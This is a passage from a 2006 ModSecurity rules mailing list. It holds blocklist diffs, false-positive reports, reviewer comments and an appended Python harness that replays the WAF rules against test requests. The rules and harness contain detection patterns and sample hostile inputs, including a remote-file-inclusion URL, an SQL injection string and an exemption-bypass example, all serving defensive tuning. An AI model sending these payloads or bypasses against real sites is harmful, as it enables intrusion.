iwVjTPir6/dILZ2lRwWI+DIuRY6Blwiy8NGKanwXc1NDcon4LGsSHH49dQBqWi3c
cOxpPeojvDbTVDyXK63c6ojoe0qBUuZuVRYwjydTrV7gqysB5omxXPrjb5wwJ3JV
5Z1vMC5M1x2x4rPAxN5WdChoaGVTBhX96BNKh9kfQJDYNZ1QGqNgN/8RJSsfWrkH
y7AWiQgjEgEdXYS2m91i7FEHreQPvKiHxfiBeMe65fm9NI/zQKsGTxt6gXFGDDjK
U+I5ZNREDlhUpIgjfwTHNvfI4n76EqnJXDUoDtTSTYnH2Ks4/Kvd5HQV5siZuqzI
sq/9m0VBvA/Mwuvxpsu5qxkRKHmHQLMZE6BkFtQDmgAKWZG3kLrhnOLXFoU6tVei
iYRmdDWf3UT5/sgDoyC3+X7DHB84PycNBqZ/gRmLPsR26H4VGBZdGvt4WgS1Iabo
Gp+4OVvoXtcdIcFL18B7tCdul58EQ6wnBhxnknPVxDixO47tYGbALY022MXrB1lz
7g/g709z8RA=
=DnPJ
-----END PGP SIGNATURE-----

From mirror at prometheus-group.com Fri Oct 13 23:21:52 2006
From: mirror at prometheus-group.com (mirror at prometheus-group.com)
Date: 13 Oct 2006 23:21:52 -0400
Subject: [Modsecurity] Modsecurity rules update for 20061013
Message-ID: <20061014032152.24766.qmail@plesk.shinn.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

New Release of GotRoot Web Signatures

Diff of /etc/modsecurity/apache2-rules.conf
Diff of /etc/modsecurity/blacklist.conf
Diff of /etc/modsecurity/proxy.conf
Diff of /etc/modsecurity/rules.conf
Diff of /etc/modsecurity/blacklist2.conf
124c124
< SecFilterSelective THE_REQUEST "home\.arcor\.de"
---
> #SecFilterSelective THE_REQUEST "home\.arcor\.de"
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/rootkits.conf
Diff of /etc/modsecurity/useragents.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/badips.conf
Diff of /etc/modsecurity/recons.conf
Diff of /etc/modsecurity/jitp.conf
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQIVAwUBRTBX0LVvl2Kn6BhaAQLSxA/9FCjvHIlmNmgW4FOKEZfkt7zk0+a00mjO
LeLBbWfscVB6E8kghkSHkUIXst1ffJZczRfUGQW8/k2yUenGdmmybpSANjQMffGA
XnCSmn1e0CEJnYS1eKpD5/aA4S91uq9nEqMWWIVrJ2ViKepksbwLJ/xZ4p9hQe0I
vh5KmnMHrgKaps6Q8n5b9G17NTKTimBc0LiKGRAHq//yH082II89sSM+0X/GsyVd
QJmqWbjjJHDCz86e6loUTx1yrrwBVmhrUDZ/bD3nJgznfX3VS1NJ1e0DnYK/mbO6
5izzZcnxg4WiWnwxG36FbYH5GJRmy+3Y2bccKejIeFcWkOJAxSzYomEzsjmIDVrI
nKtDWgU/S1GdCK4py73I3/Avcg9SL/3Sni8tTYxY1FuMEvyK8Ewxw9B9HKmC6let
BXJktMjHfrV9YCPipaEOYaYBek0EkFy7ACxDEj6jUo9FJg88mSL4pZ6veH/dKGwO
qnWE5HeD4oPnwwVsE4c3BlK57tFquuw51DgeM2hCMt/MzRp4PHghisCvloG8qDrT
0JZF3kEHOrsOBPwjUvoru+HGu1ooKr1rWuLLueOFySWrtCkSdXAFqe7815TB2wZq
x3JyVWNJYt7X/YlhnpTFHWS086xaFiAnsOUHZlZ17E70yxKZXMIk7aBcHMoaw4hv
Vn4/03EgbSM=
=4p0G
-----END PGP SIGNATURE-----
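Review bot: in the 23:20 release's 181,186c181,183 hunk, rev 3 of 300018 fires on any `.php` request with a query string whose ARGS contain `(ht|f)tps?:/`, which is every form that legitimately submits a URL (a homepage field, a `return` or redirect parameter, a link pasted into a forum post); the Joomla backend logout false positive reported on 22 Oct further down this archive is this rule, and the negated REQUEST_URI list in its first link is the only tuning knob it offers. If the 1.9 engine evaluates ARGS_VALUES per value, a `^(ht|f)tps?:/` check there would at least require the parameter to be a URL rather than merely contain one. The new 300040 is the real gain of this hunk: by dropping the trailing `(\?|&)` that rev 2 required, a URL supplied as the last parameter with nothing after it (the reported request minus its trailing `?`) is now caught.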
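Review bot: reading `<` as the new side, as in the version hunks, the 23:20 release's 124c124 hunk comments out `SecFilterSelective THE_REQUEST "home\.arcor\.de"` and the 23:21 release re-enables it; two announcements one minute apart should be collapsed into one that carries the intended state, and neither release bumps a Version line in blacklist2.conf, so mirrors cannot tell which is current. Either way the entry blocks every request line that mentions home.arcor.de, and judging from the per-user path in the reported URL that is a shared host, so legitimate links to other pages there are blocked with it; scoping the entry to the reported path (`home\.arcor\.de/dumpxpl/`) would avoid that, and an `id:` on it would let sites exempt a path.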
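Review bot: the 23:21 release's 124c124 hunk reverts the previous release's change to the same line of blacklist2.conf, restoring the active `home\.arcor\.de` entry; since this is the only hunk in the release and no Version line changes, a sentence in the announcement saying that the 23:20 release disabled the entry by mistake would save everyone a second look at the two diffs.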
From mike at gotroot.com Thu Oct 19 15:37:51 2006
From: mike at gotroot.com (Michael Shinn)
Date: Thu, 19 Oct 2006 15:37:51 -0400
Subject: [Modsecurity] Modsecurity 2.0 rules
Message-ID: <1161286671.3458.54.camel@localhost.localdomain>

Are in the works, and I should have them out this weekend. As many of you know, the format for the rules in 2.0 changed, so I have to rewrite all of the rules (thank god for find and replace, otherwise this would be even more work than it already is) and then do some pretty rigorous testing to make sure they still work properly.

I will also be going on vacation this weekend, so I won't be around for a few weeks to fix any issues with the 2.0 only rules. To that end, I would recommend you consider the 2.0 only rules as Beta quality until I can get back to respond to bug reports.

The old rules for 1.9.x will also be available for download for those that wish to stick with 1.9.x.

--
Michael T. Shinn
KeyID:0xDAE2EC86
Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86

Got Root?
http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls: http://troubleshootingfirewalls.com

From pmorak at pemocom.com Sun Oct 22 12:41:38 2006
From: pmorak at pemocom.com (Peter Morak)
Date: Sun, 22 Oct 2006 18:41:38 +0200
Subject: [Modsecurity] false positive at joomla backend logout
Message-ID: <453B9F42.3040402@pemocom.com>

Hello,

First, sorry for my bad English :)

After I installed the new rules (apache2) I think I get false positives when a user logs out from a Joomla (1.0.11) backend (a lot of customers mentioned the error).

After I commented out the following rule

#SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:3,severity:2,msg:'Generic PHP code injection protection via ARGS'"
#SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&)" chain
#SecFilterSelective ARGS "(ht|f)tps?:/"

the logout works again.

Does anyone have this error too?

thx
peter

From mike at gotroot.com Sun Oct 22 15:34:01 2006
From: mike at gotroot.com (Michael Shinn)
Date: Sun, 22 Oct 2006 15:34:01 -0400
Subject: [Modsecurity] 2.0 compatible rules out
Message-ID: <1161545641.4942.15.camel@localhost.localdomain>

I've just updated the rules to the new 2.0 format. Consider these beta rules, as they have not been as widely tested as the 1.9 format rules. If you encounter bugs, please let me know.

You can find the 2.0 beta rules here:

http://www.gotroot.com/downloads/ftp/mod_security/2.0/

--
Michael T. Shinn
KeyID:0xDAE2EC86
Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86

Got Root?
http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls: http://troubleshootingfirewalls.com

From stevewest15 at gmail.com Sat Oct 28 12:55:58 2006
From: stevewest15 at gmail.com (Steve West)
Date: Sat, 28 Oct 2006 12:55:58 -0400
Subject: [Modsecurity] Exclude a Rule w/ no ID...Any free IDs to Use?
Message-ID: <45438B9E.3060005@gmail.com>

Hi,

I'm trying to find out how I can assign an id so I can easily exclude the following rule (by adding the id and /dwmail/compose.php) to the excludes.conf file:

Here is the Rule:

#cross site scripting stealth attempt to execute Javascript code
#may false alarm for some language sets
SecFilterSelective REQUEST_URI "!(/index\.php\?module=Blocks&type=admin&func=update|/index\.php\?go=.*&edit=)" chain
SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]"

Here is the false positive:

==f0bd0d77==============================
Request: xxx.xxx.xxx.xxx xxx.xxx.xxx.239 - - [27/Oct/2006:20:59:48 -0400] "POST /dwmail/compose.php HTTP/1.1" 500 538 "http://xxx.xxx.xxx.xxx/dwmail/compose.php?sessionid=da39ebd39c7b6489a03c212216c64627" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))" RUKrg9EI6AoAAA6sCDg "-"
----------------------------------------
POST /dwmail/compose.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 6332
Content-Type: multipart/form-data; boundary=---------------------------7d62c0102e02a4
Host: xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/dwmail/compose.php?sessionid=da39ebd39c7b6489a03c212216c64627
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))
mod_security-action: 500
mod_security-message: Access denied with code 500. Pattern match "(((URL|SRC|HREF|LOWSRC)[\\s]*=)|(url[\\s]*[\\(]))[\\s]*[\\'\"]*[\\x09\\x0a\\x0b\\x0c\\x0d]*j[\\x09\\x0a\\x0b\\x0c\\x0d]*a[\\x09\\x0a\\x0b\\x0c\\x0d]*v[\\x09\\x0a\\x0b\\x0c\\x0d]*a[\\x09\\x0a\\x0b\\x0c\\x0d]*s[\\x09\\x0a\\x0b\\x0c\\x0d]*c[\\x09\\x0a\\x0b\\x0c\\x0d]*r[\\x09\\x0a\\x0b\\x0c\\x0d]*i[\\x09\\x0a\\x0b\\x0c\\x0d]*p[\\x09\\x0a\\x0b\\x0c\\x0d]*t[\\x09\\x0a\\x0b\\x0c\\x0d]*[\\:]" at POST_PAYLOAD [severity "EMERGENCY"]
-------

thx,
SW
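The questions in this archive (Gerard's "don't fire when the company name is present", the three revisions of 300018 plus the new 300040 that the spam-relay report produced, Peter's Joomla false positive and Steve's per-path exclusion) all turn on the same two ModSecurity 1.9 mechanics: a leading `!` negates a pattern, and `chain` makes a rule fire only when every link matches. The harness below is an added example, not part of this archive, of the gotroot rule set or of ModSecurity; it replays the patterns quoted above against constructed requests modelled on the reported ones. Two engine behaviours are assumed rather than quoted: that REQUEST_URI is URL-decoded before matching (the Gallery request was blocked although it was logged percent-encoded) and that patterns match case-insensitively. Rule 300016's pattern is not quoted anywhere in the thread, so `\bunion\b` stands in for it.

```python
"""Replay of the ModSecurity 1.9 chains quoted in this thread (added example).

Not code from the gotroot rule set or from ModSecurity. It models only what
the thread needs: the locations REQUEST_URI, ARGS and ARG_<name>, a leading
'!' that negates a pattern, and 'chain' (every link must match). Assumed, not
quoted: REQUEST_URI is URL-decoded before matching; matching ignores case.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit


class Request:
    """A request as the filter engine sees it: decoded URI plus GET/POST args."""

    def __init__(self, uri, body=""):
        self.uri = unquote(uri)  # assumed: engine decodes %xx before matching
        self.args = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
        self.args += parse_qsl(body, keep_blank_values=True)  # POST payload

    def location(self, name):
        """Resolve a SecFilterSelective location to the string that gets matched."""
        if name == "REQUEST_URI":
            return self.uri
        if name == "ARGS":  # all arguments, names and values
            return "&".join(f"{k}={v}" for k, v in self.args)
        if name.startswith("ARG_"):  # one named argument, GET or POST
            return "&".join(v for k, v in self.args if k == name[4:])
        raise ValueError(f"location not modelled: {name}")


def link_matches(req, location, pattern):
    """One SecFilterSelective line; '!pattern' matches when the pattern is absent."""
    negate = pattern.startswith("!")
    regex = re.compile(pattern[1:] if negate else pattern, re.IGNORECASE)
    return (regex.search(req.location(location)) is not None) != negate


def chain_fires(req, chain):
    """A rule is a list of (location, pattern) links; it fires only if all match."""
    return all(link_matches(req, loc, pat) for loc, pat in chain)


# Rule 300018 as published on 9, 10 and 13 October (patterns copied from the thread).
EXCLUDE_REV1 = ("!(/tiki-objectpermissions|aardvarkts/install/index|/gallery/do_command"
                "|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go"
                "|/goto|gallery2?/main|ad-?server/adjs)")
EXCLUDE_REV2 = EXCLUDE_REV1.replace("/gallery/do_command", "/do_command")
URL_VALUE_THEN_MORE = r"\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)"

RULE_300018_REV1 = [("REQUEST_URI", EXCLUDE_REV1), ("REQUEST_URI", URL_VALUE_THEN_MORE)]
RULE_300018_REV2 = [("REQUEST_URI", EXCLUDE_REV2), ("REQUEST_URI", URL_VALUE_THEN_MORE)]
RULE_300018_REV3 = [("REQUEST_URI", EXCLUDE_REV2),
                    ("REQUEST_URI", r"\.php(3|4|5)?(\?|&)"),
                    ("ARGS", r"(ht|f)tps?:/")]
RULE_300040 = [("REQUEST_URI", EXCLUDE_REV2),
               ("REQUEST_URI", r"\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/")]

# Constructed requests modelled on the ones reported in the thread.
GALLERY = Request("/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch"
                  "%2Fpics%2Fview_album.php&cmd=new-album")
RFI_TRAILING = Request("/folder/index.php?content=http://home.arcor.de/dumpxpl/mail.php?")
RFI_LAST_PARAM = Request("/folder/index.php?content=http://home.arcor.de/dumpxpl/mail.php")
RFI_IN_POST = Request("/folder/index.php?page=1",
                      body="content=http://home.arcor.de/dumpxpl/mail.php")

# Gerard's phpBB case. Rule 300016's pattern is not quoted in the thread, so a
# crude stand-in is used; the negated first link is the tuning he asked about.
SQLI_STANDIN = r"\bunion\b"
RULE_UNION = [("ARGS", SQLI_STANDIN)]
RULE_UNION_TUNED = [("ARGS", "!keyword union"), ("ARGS", SQLI_STANDIN)]
POST_ATTACK = Request("/posting.php", body="message=1 union select pass from users")
POST_COMPANY = Request("/posting.php", body="message=we work at keyword union ltd")
POST_EVASION = Request("/posting.php", body="message=keyword union select pass from users")

CASES = [
    ("gallery do_command, 300018 rev1", GALLERY, RULE_300018_REV1),
    ("gallery do_command, 300018 rev2", GALLERY, RULE_300018_REV2),
    ("RFI with trailing '?', rev1", RFI_TRAILING, RULE_300018_REV1),
    ("RFI as last parameter, rev1", RFI_LAST_PARAM, RULE_300018_REV1),
    ("RFI as last parameter, 300040", RFI_LAST_PARAM, RULE_300040),
    ("RFI in POST body, 300040", RFI_IN_POST, RULE_300040),
    ("RFI in POST body, rev3", RFI_IN_POST, RULE_300018_REV3),
    ("company name, untuned", POST_COMPANY, RULE_UNION),
    ("company name, tuned", POST_COMPANY, RULE_UNION_TUNED),
    ("attack, tuned", POST_ATTACK, RULE_UNION_TUNED),
    ("attack padded with company name, tuned", POST_EVASION, RULE_UNION_TUNED),
]


def verdicts():
    """Map each case label to True (request blocked) or False (request passed)."""
    return {label: chain_fires(req, rule) for label, req, rule in CASES}


if __name__ == "__main__":
    for label, blocked in verdicts().items():
        print(f"{'BLOCK' if blocked else 'pass ':5}  {label}")
```

Running it shows the rev 1 false positive on the Gallery URI and why swapping `/gallery/do_command` for `/do_command` silences it, the request shape (URL as the last parameter, or in a POST body) that rev 2 let through and that 300040 and rev 3 respectively catch, and the cost of rev 3's broad ARGS check that Peter's Joomla report illustrates. The last three cases are the caveat for Gerard's tuning: a negated pre-check is an exemption, not a fix, and a poster who knows the exempted phrase can carry "keyword union select ..." straight past the tuned rule, so the exemption should be scoped as narrowly as possible (one form field, one URI), which is exactly what the negated REQUEST_URI list in the first link of 300018 does and what Steve's per-path exclusion amounts to once the chain's first link carries an `id:` that can be referenced.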